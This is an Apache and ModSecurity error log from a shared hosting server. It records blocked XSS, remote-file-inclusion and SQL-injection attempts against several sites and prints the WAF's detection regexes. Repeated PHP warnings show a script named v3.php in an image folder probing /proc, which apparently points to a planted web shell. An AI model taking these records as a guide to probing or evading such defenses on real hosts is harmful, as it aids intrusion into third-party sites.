[Tue May 12 05:38:56.718769 2026] [security2:error] [pid 1825179:tid 1825213] [client 194.233.64.127:64738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0Nr1yOh9TvizeziiDQAAAE8"]
[Tue May 12 05:39:13.955729 2026] [security2:error] [pid 1825179:tid 1825200] [client 43.153.208.49:46496] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/henri-modeste/"] [unique_id "agKg4dr1yOh9TvizeziiHwAAAEI"]
[Tue May 12 05:39:32.775191 2026] [security2:error] [pid 1842385:tid 1842413] [client 101.32.244.128:46920] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nouveau-visuel-flb/"] [unique_id "agKg9Bs7kySIUZ3ORnIovQAAARY"]
[Tue May 12 05:39:43.024574 2026] [autoindex:error] [pid 1820198:tid 1820218] [client 34.79.136.123:1088] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:40:37.147159 2026] [security2:error] [pid 1808852:tid 1808866] [client 43.166.142.76:44882] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKhNRfeipD4uoG21Foz_AAAAAs"]
[Tue May 12 05:40:42.169882 2026] [security2:error] [pid 1825179:tid 1825212] [client 43.164.129.191:47252] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-caraibe/feed/"] [unique_id "agKhOtr1yOh9TvizeziiXQAAAE4"]
[Tue May 12 05:41:14.334349 2026] [authz_core:error] [pid 1825287:tid 1825311] [client 185.231.100.76:37154] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
[Tue May 12 05:41:15.877396 2026] [authz_core:error] [pid 1825287:tid 1825311] [client 185.231.100.76:37154] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
[Tue May 12 05:41:37.743869 2026] [authz_core:error] [pid 1825287:tid 1825324] [client 47.128.23.35:49408] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/sodium_compat/namespaced/error_log
[Tue May 12 05:41:43.069596 2026] [security2:error] [pid 1808852:tid 1808873] [client 43.165.4.2:34048] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agKhdxfeipD4uoG21Fo0dAAAABI"]
[Tue May 12 05:41:49.787176 2026] [security2:error] [pid 1820198:tid 1820218] [client 43.165.4.2:41540] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agKhfc1tk6y7yBJLpJo8eQAAAJI"], referer: http://rixonephotography.com
[Tue May 12 05:41:59.813006 2026] [security2:error] [pid 1825287:tid 1825323] [client 102.165.5.36:45097] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKhhwgpmE1yW0glLdgxLwAAANI"], referer: https://www.piregwan-genesis.com/
[Tue May 12 05:42:15.773807 2026] [authz_core:error] [pid 1825179:tid 1825222] [client 47.128.23.249:34128] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/ID3/error_log
PHP Warning:  filesize(): stat failed for /proc/357/task/357/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/357/task/357/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/357/task/357/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/357/task/357/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/357/task/357/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/357/task/357/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:43:07.667098 2026] [security2:error] [pid 1825179:tid 1825214] [client 18.208.11.93:32261] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?)(.*?)\\\\?+$" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "40"] [id "931120"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)"] [data "Matched Data: http://www.piregwan-genesis.com/index.php? found within ARGS:url: http://www.piregwan-genesis.com/index.php?"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKhy9r1yOh9Tvizezii3QAAAFA"]
[Tue May 12 05:43:07.667844 2026] [security2:error] [pid 1825179:tid 1825214] [client 18.208.11.93:32261] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKhy9r1yOh9Tvizezii3QAAAFA"]
[Tue May 12 05:43:07.668106 2026] [security2:error] [pid 1825179:tid 1825214] [client 18.208.11.93:32261] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKhy9r1yOh9Tvizezii3QAAAFA"]
[Tue May 12 05:43:22.071519 2026] [security2:error] [pid 1820198:tid 1820203] [client 43.135.211.148:55444] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/pixel-art/"] [unique_id "agKh2s1tk6y7yBJLpJo8xAAAAIM"]
[Tue May 12 05:43:29.254880 2026] [:error] [pid 1844863:tid 1844888] [client 114.119.143.207:22233] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=cart&gid=6&systpl=six&language=dutch
[Tue May 12 05:43:33.511970 2026] [security2:error] [pid 1808852:tid 1808860] [client 43.165.197.116:44882] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2026/01/Roue-Libre-extrait-site-4.mp3"] [unique_id "agKh5RfeipD4uoG21Fo1gAAAAAU"]
PHP Warning:  filesize(): stat failed for /proc/688/task/688/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/688/task/688/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/688/task/688/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/688/task/688/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/688/task/688/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/688/task/688/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:43:43.389903 2026] [ssl:error] [pid 1844863:tid 1844875] (EAI 2)Name or service not known: [client 3.18.186.238:40473] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 05:43:43.390010 2026] [ssl:error] [pid 1844863:tid 1844875] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/852/task/852/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/852/task/852/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/852/task/852/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/852/task/852/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/852/task/852/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/852/task/852/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1724/task/1724/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1724/task/1724/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1724/task/1724/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1724/task/1724/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1724/task/1724/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1724/task/1724/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:44:54.659859 2026] [:error] [pid 1825287:tid 1825320] [client 114.119.159.233:30805] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=cart&gid=4&systpl=six&language=italian
PHP Warning:  filesize(): stat failed for /proc/1704456/task/1704456/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704456/task/1704456/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704456/task/1704456/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704456/task/1704456/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704456/task/1704456/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704456/task/1704456/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706012/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706012/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706012/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706012/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706012/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706012/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:45:37.639419 2026] [security2:error] [pid 1808852:tid 1808876] [client 185.138.88.243:20467] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d420b9d1ee748fe876e738cfb5822dfb||1778559337||1778558977"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYRfeipD4uoG21Fo2LAAAABU"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.639682 2026] [security2:error] [pid 1808852:tid 1808876] [client 185.138.88.243:20467] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYRfeipD4uoG21Fo2LAAAABU"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.639923 2026] [security2:error] [pid 1808852:tid 1808876] [client 185.138.88.243:20467] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYRfeipD4uoG21Fo2LAAAABU"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.783289 2026] [security2:error] [pid 1825179:tid 1825211] [client 185.138.88.243:20493] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d420b9d1ee748fe876e738cfb5822dfb||1778559337||1778558977"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYdr1yOh9TvizezijbQAAAE0"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.783502 2026] [security2:error] [pid 1825179:tid 1825211] [client 185.138.88.243:20493] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYdr1yOh9TvizezijbQAAAE0"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.783711 2026] [security2:error] [pid 1825179:tid 1825211] [client 185.138.88.243:20493] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYdr1yOh9TvizezijbQAAAE0"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.927747 2026] [security2:error] [pid 1820198:tid 1820222] [client 185.138.88.243:20514] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d420b9d1ee748fe876e738cfb5822dfb||1778559337||1778558977"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYc1tk6y7yBJLpJo9HQAAAJY"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.928015 2026] [security2:error] [pid 1820198:tid 1820222] [client 185.138.88.243:20514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYc1tk6y7yBJLpJo9HQAAAJY"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:37.928234 2026] [security2:error] [pid 1820198:tid 1820222] [client 185.138.88.243:20514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYc1tk6y7yBJLpJo9HQAAAJY"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:38.070202 2026] [security2:error] [pid 1825287:tid 1825313] [client 185.138.88.243:20533] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d420b9d1ee748fe876e738cfb5822dfb||1778559337||1778558977"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYggpmE1yW0glLdgyKQAAAMg"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:38.070426 2026] [security2:error] [pid 1825287:tid 1825313] [client 185.138.88.243:20533] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYggpmE1yW0glLdgyKQAAAMg"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:38.070657 2026] [security2:error] [pid 1825287:tid 1825313] [client 185.138.88.243:20533] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKiYggpmE1yW0glLdgyKQAAAMg"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 05:45:52.049627 2026] [:error] [pid 1820198:tid 1820201] [client 201.71.14.79:60298] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
PHP Warning:  filesize(): stat failed for /proc/53/task/53/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/53/task/53/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/53/task/53/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/53/task/53/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/53/task/53/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/53/task/53/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705228/task/1705228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705228/task/1705228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705228/task/1705228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705228/task/1705228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705228/task/1705228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705228/task/1705228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:46:34.912476 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:35.922326 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:36.051480 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:46:36.172783 2026] [proxy_fcgi:error] [pid 1808852:tid 1808874] [client 172.212.136.43:32742] AH01071: Got error 'Primary script unknown'
